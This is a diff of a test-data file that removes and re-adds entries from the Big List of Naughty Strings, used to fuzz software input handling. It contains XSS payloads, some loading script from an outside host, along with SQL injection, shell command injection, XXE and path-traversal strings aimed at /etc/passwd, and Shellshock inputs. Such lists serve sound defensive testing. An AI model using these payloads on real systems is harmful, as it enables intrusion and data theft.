-"ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ",
-"Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ",
-
-// Unicode Upsidedown
-//
-// Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com)
-
-"ᅨル￉ミnb£ᄡノl￉ミ ￉ミuᅥテ￉ミ￉ᆵ ᅦン￉ᄍolop ᅧヌᅦン ᅦン￉ᄍoq￉ミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノ￉ヤu£ᄡノ ￉ᄍod￉ᆵᅦンᅧヌ po￉ᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン ᅥテu£ᄡノ￉ヤs£ᄡノd£ᄡノp￉ミ ￉ᄍnᅧヌᅦンᅧヌ￉ヤᅦンsuo￉ヤ 'ᅧヌᅦン￉ᆵ￉ミ ᅧヌ£ᄡノs ￉ᄍolop ￉ᆵnsd£ᄡノ ￉ᆵᅦン￉ᄍoᅨᆬ",
-"00ᅨルᅥヨ$-",
-
-// Unicode font
-//
-// Strings which contain bold/italic/etc. versions of normal characters
-
-"￯ᄐᄡ￯ᄑネ￯ᄑナ ￯ᄑム￯ᄑユ￯ᄑノ￯ᄑテ￯ᄑヒ ￯ᄑツ￯ᄑメ￯ᄑマ￯ᄑラ￯ᄑホ ￯ᄑニ￯ᄑマ￯ᄑリ ￯ᄑハ￯ᄑユ￯ᄑヘ￯ᄑミ￯ᄑモ ￯ᄑマ￯ᄑヨ￯ᄑナ￯ᄑメ ￯ᄑヤ￯ᄑネ￯ᄑナ ￯ᄑフ￯ᄑチ￯ᄑレ￯ᄑル ￯ᄑト￯ᄑマ￯ᄑヌ",
-"￰ンミモ￰ンミᄀ￰ンミ゙ ￰ンミᆰ￰ンミᆴ￰ンミᄁ￰ンミワ￰ンミᄂ ￰ンミロ￰ンミᆱ￰ンミᄄ￰ンミᄚ￰ンミᄃ ￰ンミ゚￰ンミᄄ￰ンミᄆ ￰ンミᆪ￰ンミᆴ￰ンミᆭ￰ンミᄅ￰ンミᆲ ￰ンミᄄ￰ンミᆵ￰ンミ゙￰ンミᆱ ￰ンミᆳ￰ンミᄀ￰ンミ゙ ￰ンミᆬ￰ンミレ￰ンミᄈ￰ンミᄇ ￰ンミン￰ンミᄄ￰ンミᅠ",
-"￰ンユ﾿￰ンヨヘ￰ンヨハ ￰ンヨヨ￰ンヨレ￰ンヨホ￰ンヨネ￰ンヨミ ￰ンヨヌ￰ンヨラ￰ンヨヤ￰ンヨワ￰ンヨモ ￰ンヨヒ￰ンヨヤ￰ンヨン ￰ンヨマ￰ンヨレ￰ンヨメ￰ンヨユ￰ンヨリ ￰ンヨヤ￰ンヨロ￰ンヨハ￰ンヨラ ￰ンヨル￰ンヨヘ￰ンヨハ ￰ンヨム￰ンヨニ￰ンヨ゚￰ンヨ゙ ￰ンヨノ￰ンヨヤ￰ンヨフ",
-"￰ンムᄏ￰ンメノ￰ンメニ ￰ンメメ￰ンメヨ￰ンメハ￰ンメト￰ンメフ ￰ンメテ￰ンメモ￰ンメミ￰ンメリ￰ンメマ ￰ンメヌ￰ンメミ￰ンメル ￰ンメヒ￰ンメヨ￰ンメホ￰ンメム￰ンメヤ ￰ンメミ￰ンメラ￰ンメニ￰ンメモ ￰ンメユ￰ンメノ￰ンメニ ￰ンメヘ￰ンメツ￰ンメロ￰ンメレ ￰ンメナ￰ンメミ￰ンメネ",
-"￰ンモᆪ￰ンモᄆ￰ンモᆴ ￰ンモᄎ￰ンモᄒ￰ンモᄇ￰ンモᆲ￰ンモᄡ ￰ンモᆱ￰ンモᄏ￰ンモᄌ￰ンヤタ￰ンモᄋ ￰ンモᆵ￰ンモᄌ￰ンヤチ ￰ンモᄈ￰ンモᄒ￰ンモᄊ￰ンモᄍ￰ンモᄐ ￰ンモᄌ￰ンモ﾿￰ンモᆴ￰ンモᄏ ￰ンモᄑ￰ンモᄆ￰ンモᆴ ￰ンモᄉ￰ンモᆰ￰ンヤテ￰ンヤツ ￰ンモᆳ￰ンモᄌ￰ンモᄚ",
-"￰ンユヒ￰ンユル￰ンユヨ ￰ンユᄁ￰ンユᆭ￰ンユレ￰ンユヤ￰ンユワ ￰ンユモ￰ンユᆪ￰ンユᅠ￰ンユᄄ￰ンユ゚ ￰ンユラ￰ンユᅠ￰ンユᄅ ￰ンユロ￰ンユᆭ￰ンユ゙￰ンユᄀ￰ンユᄂ ￰ンユᅠ￰ンユᄃ￰ンユヨ￰ンユᆪ ￰ンユᆬ￰ンユル￰ンユヨ ￰ンユン￰ンユメ￰ンユᆱ￰ンユᆰ ￰ンユユ￰ンユᅠ￰ンユリ",
-"￰ンレテ￰ンレム￰ンレホ ￰ンレレ￰ンレ゙￰ンレメ￰ンレフ￰ンレヤ ￰ンレヒ￰ンレロ￰ンレリ￰ンレᅠ￰ンレラ ￰ンレマ￰ンレリ￰ンレᄀ ￰ンレモ￰ンレ゙￰ンレヨ￰ンレル￰ンレワ ￰ンレリ￰ンレ゚￰ンレホ￰ンレロ ￰ンレン￰ンレム￰ンレホ ￰ンレユ￰ンレハ￰ンレᆪ￰ンレᄁ ￰ンレヘ￰ンレリ￰ンレミ",
-"¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ ¬メ゚¬メᆰ¬メᄁ",
-
-// Script Injection
-//
-// Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
-
-"<script>alert(123)</script>",
-"&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;",
-"<img src=x onerror=alert(123) />",
-"<svg><script>123<1>alert(123)</script>",
-"\"><script>alert(123)</script>",
-"'><script>alert(123)</script>",
-"><script>alert(123)</script>",
-"</script><script>alert(123)</script>",
-"< / script >< script >alert(123)< / script >",
-" onfocus=JaVaSCript:alert(123) autofocus",
-"\" onfocus=JaVaSCript:alert(123) autofocus",
-"' onfocus=JaVaSCript:alert(123) autofocus",
-"￯ᄐワscript￯ᄐ゙alert(123)￯ᄐワ/script￯ᄐ゙",
-"<sc<script>ript>alert(123)</sc</script>ript>",
-"--><script>alert(123)</script>",
-"\";alert(123);t=\"",
-"';alert(123);t='",
-"JavaSCript:alert(123)",
-";alert(123);",
-"src=JaVaSCript:prompt(132)",
-"\"><script>alert(123);</script x=\"",
-"'><script>alert(123);</script x='",
-"><script>alert(123);</script x=",
-"\" autofocus onkeyup=\"javascript:alert(123)",
-"' autofocus onkeyup='javascript:alert(123)",
-"<script\\x20type=\"text/javascript\">javascript:alert(1);</script>",
-"<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>",
-"<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>",
-"<script\\x09type=\"text/javascript\">javascript:alert(1);</script>",
-"<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>",
-"<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>",
-"<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>",
-"'`\"><\\x3Cscript>javascript:alert(1)</script>",
-"'`\"><\\x00script>javascript:alert(1)</script>",
-"ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF",
-"ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF",
-"<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
-"`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>",
-"`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>",
-"`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>",
-"`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>",
-"`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>",
-"`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>",
-"`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>",
-"`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>",
-"`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>",
-"`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>",
-"\"`'><script>\\x3Bjavascript:alert(1)</script>",
-"\"`'><script>\\x0Djavascript:alert(1)</script>",
-"\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>",
-"\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>",
-"\"`'><script>\\x09javascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>",
-"\"`'><script>\\x00javascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>",
-"\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>",
-"\"`'><script>\\x0Cjavascript:alert(1)</script>",
-"\"`'><script>\\x2Bjavascript:alert(1)</script>",
-"\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>",
-"\"`'><script>-javascript:alert(1)</script>",
-"\"`'><script>\\x0Ajavascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>",
-"\"`'><script>\\x7Ejavascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>",
-"\"`'><script>\\xC2\\x85javascript:alert(1)</script>",
-"\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>",
-"\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>",
-"\"`'><script>\\x21javascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>",
-"\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>",
-"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>",
-"\"`'><script>\\x0Bjavascript:alert(1)</script>",
-"\"`'><script>\\x20javascript:alert(1)</script>",
-"\"`'><script>\\xC2\\xA0javascript:alert(1)</script>",
-"<img \\x00src=x onerror=\"alert(1)\">",
-"<img \\x47src=x onerror=\"javascript:alert(1)\">",
-"<img \\x11src=x onerror=\"javascript:alert(1)\">",
-"<img \\x12src=x onerror=\"javascript:alert(1)\">",
-"<img\\x47src=x onerror=\"javascript:alert(1)\">",
-"<img\\x10src=x onerror=\"javascript:alert(1)\">",
-"<img\\x13src=x onerror=\"javascript:alert(1)\">",
-"<img\\x32src=x onerror=\"javascript:alert(1)\">",
-"<img\\x47src=x onerror=\"javascript:alert(1)\">",
-"<img\\x11src=x onerror=\"javascript:alert(1)\">",
-"<img \\x47src=x onerror=\"javascript:alert(1)\">",
-"<img \\x34src=x onerror=\"javascript:alert(1)\">",
-"<img \\x39src=x onerror=\"javascript:alert(1)\">",
-"<img \\x00src=x onerror=\"javascript:alert(1)\">",
-"<img src\\x09=x onerror=\"javascript:alert(1)\">",
-"<img src\\x10=x onerror=\"javascript:alert(1)\">",
-"<img src\\x13=x onerror=\"javascript:alert(1)\">",
-"<img src\\x32=x onerror=\"javascript:alert(1)\">",
-"<img src\\x12=x onerror=\"javascript:alert(1)\">",
-"<img src\\x11=x onerror=\"javascript:alert(1)\">",
-"<img src\\x00=x onerror=\"javascript:alert(1)\">",
-"<img src\\x47=x onerror=\"javascript:alert(1)\">",
-"<img src=x\\x09onerror=\"javascript:alert(1)\">",
-"<img src=x\\x10onerror=\"javascript:alert(1)\">",
-"<img src=x\\x11onerror=\"javascript:alert(1)\">",
-"<img src=x\\x12onerror=\"javascript:alert(1)\">",
-"<img src=x\\x13onerror=\"javascript:alert(1)\">",
-"<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">",
-"<img src=x onerror=\\x09\"javascript:alert(1)\">",
-"<img src=x onerror=\\x10\"javascript:alert(1)\">",
-"<img src=x onerror=\\x11\"javascript:alert(1)\">",
-"<img src=x onerror=\\x12\"javascript:alert(1)\">",
-"<img src=x onerror=\\x32\"javascript:alert(1)\">",
-"<img src=x onerror=\\x00\"javascript:alert(1)\">",
-"<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>",
-"<img src=\"x` `<script>javascript:alert(1)</script>\"` `>",
-"<img src onerror /\" '\"= alt=javascript:alert(1)//\">",
-"<title onpropertychange=javascript:alert(1)></title><title title=>",
-"<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">",
-"<!--[if]><script>javascript:alert(1)</script -->",
-"<!--[if<img src=x onerror=javascript:alert(1)//]> -->",
-"<script src=\"/\%(jscript)s\"></script>",
-"<script src=\"\\%(jscript)s\"></script>",
-"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
-"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
-"<IMG SRC=# onmouseover=\"alert('xxs')\">",
-"<IMG SRC= onmouseover=\"alert('xxs')\">",
-"<IMG onmouseover=\"alert('xxs')\">",
-"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
-"<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
-"<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
-"<IMG SRC=\"jav ascript:alert('XSS');\">",
-"<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
-"<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
-"<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
-"perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out",
-"<IMG SRC=\" &#14; javascript:alert('XSS');\">",
-"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
-"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
-"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
-"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
-"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
-"<SCRIPT SRC=//ha.ckers.org/.j>",
-"<IMG SRC=\"javascript:alert('XSS')\"",
-"<iframe src=http://ha.ckers.org/scriptlet.html <",
-"\\\";alert('XSS');//",
-"<u oncopy=alert()> Copy me</u>",
-"<i onwheel=alert(1)> Scroll over me </i>",
-"<plaintext>",
-"http://a/%%30%30",
-"</textarea><script>alert(123)</script>",
-
-// SQL Injection
-//
-// Strings which can cause a SQL injection if inputs are not sanitized
-
-"1;DROP TABLE users",
-"1'; DROP TABLE users-- 1",
-"' OR 1=1 -- 1",
-"' OR '1'='1",
-" ",
-"%",
-"_",
-
-// Server Code Injection
-//
-// Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)
-
-"-",
-"--",
-"--version",
-"--help",
-"$USER",
-"/dev/null; touch /tmp/blns.fail ; echo",
-"`touch /tmp/blns.fail`",
-"$(touch /tmp/blns.fail)",
-"@{[system \"touch /tmp/blns.fail\"]}",
-
-// Command Injection (Ruby)
-//
-// Strings which can call system commands within Ruby/Rails applications
-
-"eval(\"puts 'hello world'\")",
-"System(\"ls -al /\")",
-"`ls -al /`",
-"Kernel.exec(\"ls -al /\")",
-"Kernel.exit(1)",
-"%x('ls -al /')",
-
-// XXE Injection (XML)
-//
-// String which can reveal system files when parsed by a badly configured XML parser
-
-"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
-
-// Unwanted Interpolation
-//
-// Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.
-
-"$HOME",
-"$ENV{'HOME'}",
-"%d",
-"%s",
-"{0}",
-"%*.*s",
-"File:///",
-
-// File Inclusion
-//
-// Strings which can cause user to pull in files that should not be a part of a web server
-
-"../../../../../../../../../../../etc/passwd%00",
-"../../../../../../../../../../../etc/hosts",
-
-// Known CVEs and Vulnerabilities
-//
-// Strings that test for known vulnerabilities
-
-"() { 0; }; touch /tmp/blns.shellshock1.fail;",
-"() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }",
-"<<< %s(un='%s') = %u",
-"+++ATH0",
-
-// MSDOS/Windows Special Filenames
-//
-// Strings which are reserved characters in MSDOS/Windows
-
-"CON",
-"PRN",
-"AUX",
-"CLOCK$",
-"NUL",
-"A:",
-"ZZ:",
-"COM1",
-"LPT1",
-"LPT2",
-"LPT3",
-"COM2",
-"COM3",
-"COM4",
-
-// IRC specific strings
-//
-// Strings that may occur on IRC clients that make security products freak out
-
-"DCC SEND STARTKEYLOGGER 0 0 0",
-
-// Scunthorpe Problem
-//
-// Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)
-
-"Scunthorpe General Hospital",
-"Penistone Community Church",
-"Lightwater Country Park",
-"Jimmy Clitheroe",
-"Horniman Museum",
-"shitake mushrooms",
-"RomansInSussex.co.uk",
-"http://www.cum.qc.ca/",
-"Craig Cockburn, Software Specialist",
-"Linda Callahan",
-"Dr. Herman I. Libshitz",
-"magna cum laude",
-"Super Bowl XXX",
-"medieval erection of parapets",
-"evaluate",
-"mocha",
-"expression",
-"Arsenal canal",
-"classic",
-"Tyson Gay",
-"Dick Van Dyke",
-"basement",
-
-// Human injection
-//
-// Strings which may cause human to reinterpret worldview
-
-"If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.",
-
-// Terminal escape codes
-//
-// Strings which punish the fools who use cat/type on this file
-
-"Roses are red, violets are blue. Hope you enjoy terminal hue",
-"But now...for my greatest trick...",
-"The quick brown fox... [Beeeep]",
-
-// iOS Vulnerabilities
-//
-// Strings which crashed iMessage in various versions of iOS
-
-"Power￙ト￙マ￙ト￙マ￘ᄉ￙ム￘ᄄ￙マ￙ト￙マ￙ト￘ᄉ￙ム￘ᄄ￙マ￘ᄆ￘ᄆ￙ヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ ¢ᆬᆪ¥ニラ",
-"￰゚マᄈ0￰゚フネ￯ᄌマ"
-}; \ No newline at end of file
+ // sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt
+
+ // Reserved Strings
+ //
+ // Strings which may be used elsewhere in code
+
+ "undefined", "undef", "null", "NULL", "(null)", "nil", "NIL", "true", "false", "True", "False", "TRUE", "FALSE", "None", "hasOwnProperty", "\\", "\\\\",
+
+ // Numeric Strings
+ //
+ // Strings which can be interpreted as numeric
+
+ "0", "1", "1.00", "$1.00", "1/2", "1E2", "1E02", "1E+02", "-1", "-1.00", "-$1.00", "-1/2", "-1E2", "-1E02", "-1E+02", "1/0", "0/0", "-2147483648/-1",
+ "-9223372036854775808/-1", "-0", "-0.0", "+0", "+0.0", "0.00", "0..0", ".", "0.0.0", "0,00", "0,,0", ",", "0,0,0", "0.0/0", "1.0/0.0", "0.0/0.0", "1,0/0,0",
+ "0,0/0,0", "--1", "-", "-.", "-,", "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", "NaN", "Infinity",
+ "-Infinity", "INF", "1#INF", "-1#IND", "1#QNAN", "1#SNAN", "1#IND", "0x0", "0xffffffff", "0xffffffffffffffff", "0xabad1dea",
